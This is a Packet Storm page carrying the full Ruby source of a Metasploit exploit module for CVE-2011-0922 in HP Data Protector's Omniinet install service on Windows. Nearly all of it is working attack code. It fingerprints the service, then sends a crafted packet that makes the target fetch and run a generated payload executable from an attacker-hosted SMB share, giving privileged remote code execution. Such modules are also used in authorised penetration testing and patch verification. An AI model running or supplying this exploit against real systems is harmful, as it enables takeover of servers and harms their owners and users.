This Metasploit module exploits HP Data Protector Omniinet process on Windows only. This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable. To ensure this works, the SMB server created in MSF must have a share called Omniback which has a subfolder i386.
3f3ee3bebaadc3f10e4f57cb6e085b314f160caf7c79688ef8fc177c8ea4eea2##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'HP Data Protector 6.10/6.11/6.20 Install Service',
'Description' => %q{
This module exploits HP Data Protector Omniinet process on Windows only.
This exploit invokes the install service function which allows an attacker to create a
custom payload in the format of an executable.
To ensure this works, the SMB server created in MSF must have a share called Omniback
which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\
},
'Author' => [
'Ben Turner',
],
'References' =>
[
['CVE', '2011-0922'],
['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Privileged' => true,
'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'HP Data Protector 6.10/6.11/6.20 / Windows', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 02 2011'))
register_options(
[
Opt::RPORT(5555),
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
], self.class)
deregister_options('FOLDER_NAME')
deregister_options('FILE_CONTENTS')
deregister_options('SHARE')
deregister_options('FILE_NAME')
end
def peer
"#{rhost}:#{rport}"
end
def check
fingerprint = get_fingerprint
if fingerprint.nil?
vprint_status('Unable to fingerprint because no response.')
return Exploit::CheckCode::Unknown
end
vprint_status("#{peer} - #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/i
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect
return nil if resp.nil?
# Delete unicode last null
Rex::Text.to_ascii(resp).chop.chomp
end
def primer
self.file_contents = generate_payload_exe
self.file_name = "installservice.exe"
self.share = "Omniback\\i386"
print_status("File available on #{unc}...")
vprint_status("#{peer} - Trying to execute remote EXE...")
lhost = "#{datastore['SRVHOST']}"
lhostfull = ""
lhost.each_char do |character|
lhostfull = lhostfull << "\x00" << character
end
packet = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
packet << lhostfull
packet << "\x00\x00\x00\x20\x00\x30\x00"
packet << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
packet << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
packet << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
packet << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
packet << "\x5c"
packet << lhostfull
packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
packet << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
packet << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
packet << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
packet << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
packet << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
packet << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
packet << lhostfull
packet << "\x5c\x00\x5c\x00\x4f\x00"
packet << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
packet << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
packet << "\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
packet << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
packet << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
packet << "\x5c\x00\x5c"
packet << lhostfull
packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
packet << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
packet << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
packet << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
packet << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
packet << lhostfull
packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
packet << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
connect
sock.put(packet)
disconnect
end
def exploit
begin
Timeout.timeout(datastore['SMB_DELAY']) {super}
rescue Timeout::Error
# Stop SMB Server
end
end
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed